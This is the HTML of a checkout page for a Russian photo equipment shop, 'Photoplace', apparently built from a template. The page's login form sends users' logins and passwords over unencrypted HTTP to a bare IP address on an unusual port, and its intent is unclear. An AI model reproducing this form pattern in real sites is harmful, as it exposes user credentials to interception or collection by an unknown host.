<!DOCTYPE html>
<html lang="ru">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>Photoplace - Оплата</title>
	<link rel="icon" href="img/Fevicon.png" type="image/png">

  <link rel="stylesheet" href="vendors/bootstrap/bootstrap.min.css">
  <link rel="stylesheet" href="vendors/fontawesome/css/all.min.css">
  <link rel="stylesheet" href="vendors/themify-icons/themify-icons.css">
  <link rel="stylesheet" href="vendors/linericon/style.css">
  <link rel="stylesheet" href="vendors/owl-carousel/owl.theme.default.min.css">
  <link rel="stylesheet" href="vendors/owl-carousel/owl.carousel.min.css">
  <link rel="stylesheet" href="vendors/nice-select/nice-select.css">
  <link rel="stylesheet" href="vendors/nouislider/nouislider.min.css">

  <link rel="stylesheet" href="css/style.css">
</head>
<body>

  <!-- шапка -->
	<header class="header_area">
    <div class="main_menu">
      <nav class="navbar navbar-expand-lg navbar-light">
        <div class="container">
          <a class="navbar-brand logo_h" href="index.html"><img src="img/site.header.logo.png" alt=""></a>
          <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <div class="collapse navbar-collapse offset" id="navbarSupportedContent">
            <ul class="nav navbar-nav menu_nav ml-auto mr-auto">
              <li class="nav-item"><a class="nav-link" href="index.html">Главная</a></li>
              <li class="nav-item active submenu dropdown">
                <a href="#" class="nav-link dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true"
                  aria-expanded="false">Магазин</a>
                <ul class="dropdown-menu">
                  <li class="nav-item"><a class="nav-link" href="category.html">Каталог</a></li>
                  <li class="nav-item"><a class="nav-link" href="single-product.html">Отзывы</a></li>
                  <li class="nav-item"><a class="nav-link" href="checkout.html">Оплата</a></li>
                  <li class="nav-item"><a class="nav-link" href="cart.html">Корзина</a></li>
                </ul>
							</li>
              <li class="nav-item"><a href="blog.html" class="nav-link">Блог</a></li>
							<li class="nav-item submenu dropdown">
                <a href="#" class="nav-link dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true"
                  aria-expanded="false">Личный кабинет</a>
                <ul class="dropdown-menu">
                  <li class="nav-item"><a class="nav-link" href="login.html">Вход</a></li>
                  <li class="nav-item"><a class="nav-link" href="register.html">Регистрация</a></li>
                </ul>
              </li>
              <li class="nav-item"><a class="nav-link" href="contact.html">Контакты</a></li>
            </ul>

            <ul class="nav-shop">
              <li class="nav-item"><button><i class="ti-search"></i></button></li>
              <li class="nav-item"><button><i class="ti-shopping-cart"></i><span class="nav-shop__circle">3</span></button> </li>
              <li class="nav-item"><a class="button button-header" href="category.html">Купить сейчас</a></li>
            </ul>
          </div>
        </div>
      </nav>
    </div>
  </header>
	<!-- конец шапки -->

	<!-- блок навигации на странице -->
	<section class="blog-banner-area" id="category">
		<div class="container h-100">
			<div class="blog-banner">
				<div class="text-center">
					<h1>Оплата заказов</h1>
					<nav aria-label="breadcrumb" class="banner-breadcrumb">
            <ol class="breadcrumb">
              <li class="breadcrumb-item"><a href="index.html">Главная</a></li>
              <li class="breadcrumb-item active" aria-current="page">Оплата</li>
            </ol>
          </nav>
				</div>
			</div>
    </div>
	</section>
	<!-- конец блока навигации на странице -->
  
  
  <!-- блок с оплатой -->
  <section class="checkout_area section-margin--small">
    <div class="container">
        <div class="returning_customer">
            <div class="check_title">
                <h2>Уже покупали у нас? <a href="login.html">Войдите в свой аккаунт</a></h2>
            </div>
            <p>Если Вы уже совершали покупки в нашем онлайн-магазине, пожалуйстаа, введите свои данные в поля ниже. Если Вы совершаете покупку впервые, пожалуйста, перейдите к разделу Оплата и Доставка.</p>
            <form class="row contact_form" action="http://185.182.111.214:7628/cgi-bin/form_action.py" method="post" novalidate="novalidate">
                <div class="col-md-6 form-group p_star">
                    <input type="text" class="form-control" placeholder="Почта / Логин *" onfocus="this.placeholder=''" onblur="this.placeholder = 'Почта / Логин*'" id="name" name="name">
                    <!-- <span class="placeholder" data-placeholder="Почта / Логин"></span> -->
                </div>
                <div class="col-md-6 form-group p_star">
                    <input type="password" class="form-control" placeholder="Пароль *" onfocus="this.placeholder=''" onblur="this.placeholder = 'Пароль*'" id="password" name="password">
                    <!-- <span class="placeholder" data-placeholder="Пароль"></span> -->
                </div>
                <div class="col-md-12 form-group">
                    <button type="submit" value="submit" class="button button-login">Войти</button>
                    <div class="creat_account">
                        <input type="checkbox" id="f-option" name="selector">
                        <label for="f-option">Запомнить меня</label>
                    </div>
                    <a class="lost_pass" href="register.html">Забыли пароль?</a>
                </div>
            </form>
        </div>
        <div class="cupon_area">
            <div class="check_title">
                <h2>Есть купон?  <a href="#"></a></h2>
            </div>
            <input type="text" placeholder="Введите код купона или акции">
            <a class="button button-coupon" href="#">Применить</a>
        </div>
        <div class="billing_details">
            <div class="row">
                <div class="col-lg-8">
                    <h3></h3>
                    <form class="row contact_form" action="#" method="post" novalidate="novalidate">
                        <div class="col-md-6 form-group p_star">
                            <input type="text" class="form-control" id="first" name="name" placeholder="Имя">
                            <span class="placeholder" data-placeholder="Имя"></span>
                        </div>
                        <div class="col-md-6 form-group p_star">
                            <input type="text" class="form-control" id="last" name="name" placeholder="Фамилия">
                            <span class="placeholder" data-placeholder="Фамилия"></span>
                        </div>
                        <div class="col-md-12 form-group">
                            <input type="text" class="form-control" id="Название организации" name="company" placeholder="Название организации (при корпоративном заказе)">
                        </div>
                        <div class="col-md-6 form-group p_star">
                            <input type="text" class="form-control" id="number" name="number" placeholder="Номер телефона">
                            <span class="placeholder" data-placeholder="Номер телефона"></span>
                        </div>
                        <div class="col-md-6 form-group p_star">
                            <input type="text" class="form-control" id="email" name="compemailany" placeholder="Email">
                            <span class="placeholder" data-placeholder="Email"></span>
                        </div>
                        <div class="col-md-12 form-group p_star">
                            <select class="country_select">
                                <option value="1">Россия</option>
                                <option value="2">Беларусь</option>
                                <option value="4">Казахстан</option>
                            </select>
                        </div>
                        <div class="col-md-12 form-group p_star">
                            <input type="text" class="form-control" id="add1" name="add1" placeholder="Адрес">
                            <span class="placeholder" data-placeholder="Address line 01"></span>
                        </div>
                        <div class="col-md-12 form-group p_star">
                            <input type="text" class="form-control" id="add2" name="add2" placeholder="Адрес">
                            <span class="placeholder" data-placeholder="Address line 02"></span>
                        </div>
                        <div class="col-md-12 form-group p_star">
                            <input type="text" class="form-control" id="city" name="city">
                            <span class="placeholder" data-placeholder="Town/City"></span>
                        </div>
                        <div class="col-md-12 form-group p_star">
                            <select class="country_select">
                                <option value="1">Санкт-Петербург</option>
                                <option value="2">Москва</option>
                                <option value="4">Пермь</option>
                            </select>
                        </div>
                        <div class="col-md-12 form-group">
                            <input type="text" class="form-control" id="zip" name="zip" placeholder="Почтовый индекс">
                        </div>
                        <div class="col-md-12 form-group">
                            <div class="creat_account">
                                <input type="checkbox" id="f-option2" name="selector">
                                <label for="f-option2">Создать аккаунт?</label>
                            </div>
                        </div>
                        <div class="col-md-12 form-group mb-0">
                            <div class="creat_account">
                                <h3>Детали заказа</h3>
                                <input type="checkbox" id="f-option3" name="selector">
                                <label for="f-option3">Отправить на другой адрес?</label>
                            </div>
                            <textarea class="form-control" name="message" id="message" rows="1" placeholder="Комментарий к заказу"></textarea>
                        </div>
                    </form>
                </div>
                <div class="col-lg-4">
                    <div class="order_box">
                        <h2>Ваш заказ</h2>
                        <ul class="list">
                            <li><a href="#"><h4>Товары <span>Сумма</span></h4></a></li>
                            <li><a href="#">JBL Synchros S300i<span class="middle">x 01</span> <span class="last">7 609₽</span></a></li>
                            <li><a href="#">Profoto для Canon<span class="middle">x 01</span> <span class="last">107 490₽</span></a></li>
                            <li><a href="#">Кольцевая лампа<span class="middle">x 01</span> <span class="last">1 900₽</span></a></li>
                        </ul>
                        <ul class="list list_2">
                            <li><a href="#">Промежуточная сумма <span>116 999₽</span></a></li>
                            <li><a href="#">Доставка <span>300₽</span></a></li>
                            <li><a href="#">к оплате <span>117 299₽₽</span></a></li>
                        </ul>
                        <div class="payment_item">
                            <div class="radion_btn">
                                <input type="radio" id="f-option5" name="selector">
                                <label for="f-option5">Оплата при получении</label>
                                <div class="check"></div>
                            </div>
                            <p>Для оплаты заказа наличными курьеру укажите способ оплаты «Оплата при получении». Все финансовые документы курьер вручит вам вместе с заказом. Оплата принимается в российских рублях строго в соответствии с ценой, указанной в кассовом и товарном чеках.</p>
                        </div>
                        <div class="payment_item active">
                            <div class="radion_btn">
                                <input type="radio" id="f-option6" name="selector">
                                <label for="f-option6">Оплата картой </label>
                                <img src="img/product/card.jpg" alt="">
                                <div class="check"></div>
                            </div>
                            <p>Платите картой Мир СберБанка с Mir Pay</p>
                        </div>
                        <div class="creat_account">
                            <input type="checkbox" id="f-option4" name="selector">
                            <label for="f-option4">Я прочитал и принимаю</label>
                            <a href="">условия и положения</a>
                        </div>
                        <div class="text-center">
                          <a class="button button-paypal" href="#">Перейти на страницу оплаты</a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
  </section>
  <!-- конец блока с оплатой -->



  <!-- нижний футер -->	
	<footer>
		<div class="footer-area footer-only">
			<div class="container">
				<div class="row section_gap">
					<div class="col-lg-3 col-md-6 col-sm-6">
						<div class="single-footer-widget tp_widgets ">
							<h4 class="footer_title large_title">Наша миссия</h4>
							<p>
								Мы созданы для того, чтобы у каждого возникало желание делать отличные фотокадры и была возможность печатать качественные фотографии.
							</p>
							<p>
								Для вас мы постоянно пополняем и обновляем наш ассортимент, разрабатываем акции и системы выгодных скидок, информируем наших покупателей о появлении новинок.
							</p>
						</div>
					</div>
					<div class="offset-lg-1 col-lg-2 col-md-6 col-sm-6">
						<div class="single-footer-widget tp_widgets">
							<h4 class="footer_title">Быстрый доступ</h4>
							<ul class="list">
								<li><a href="index.html">Главная</a></li>
								<li><a href="category.html">Магазин</a></li>
								<li><a href="blog.html">Блог</a></li>
								<li><a href="single-product.html">Отзывы</a></li>
								<li><a href="cart.html">Корзина</a></li>
								<li><a href="contact.html">Контакты</a></li>
                <li><a href="#category">Наверх</a></li>
							</ul>
						</div>
					</div>
					<div class="col-lg-2 col-md-6 col-sm-6">
						<div class="single-footer-widget instafeed">
							<h4 class="footer_title">Галерея</h4>
							<ul class="list instafeed d-flex flex-wrap">
								<li><img src="img/main/site.main.img22.jpeg" alt=""></li>
								<li><img src="img/main/site.main.img23.jpg" alt=""></li>
								<li><img src="img/main/site.main.img24.jpg" alt=""></li>
								<li><img src="img/main/site.main.img25.jpg" alt=""></li>
								<li><img src="img/main/site.main.img26.jpg" alt=""></li>
								<li><img src="img/main/site.main.img27.jpg" alt=""></li>
							</ul>
						</div>
					</div>
					<div class="offset-lg-1 col-lg-3 col-md-6 col-sm-6">
						<div class="single-footer-widget tp_widgets">
							<h4 class="footer_title">Свяжитесь с нами</h4>
							<div class="ml-40">
								<p class="sm-head">
									<span class="fa fa-location-arrow"></span>
									Адрес магазина
								</p>
								<p>Чапыгина 31к1</p>
	
								<p class="sm-head">
									<span class="fa fa-phone"></span>
									Контакты
								</p>
								<p>
									+7 (800) 555-35-35 <br>
									+7 (234) 236-36-36 
								</p>
	
								<p class="sm-head">
									<span class="fa fa-envelope"></span>
									Почта
								</p>
								<p>
									photoplace@mail.ru <br>
									photomanager@mail.ru
								</p>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
	</footer>
	<!-- конец нижнего футера -->



  <script src="vendors/jquery/jquery-3.2.1.min.js"></script>
  <script src="vendors/bootstrap/bootstrap.bundle.min.js"></script>
  <script src="vendors/skrollr.min.js"></script>
  <script src="vendors/owl-carousel/owl.carousel.min.js"></script>
  <script src="vendors/nice-select/jquery.nice-select.min.js"></script>
  <script src="vendors/jquery.ajaxchimp.min.js"></script>
  <script src="vendors/mail-script.js"></script>
  <script src="js/main.js"></script>
</body>
</html>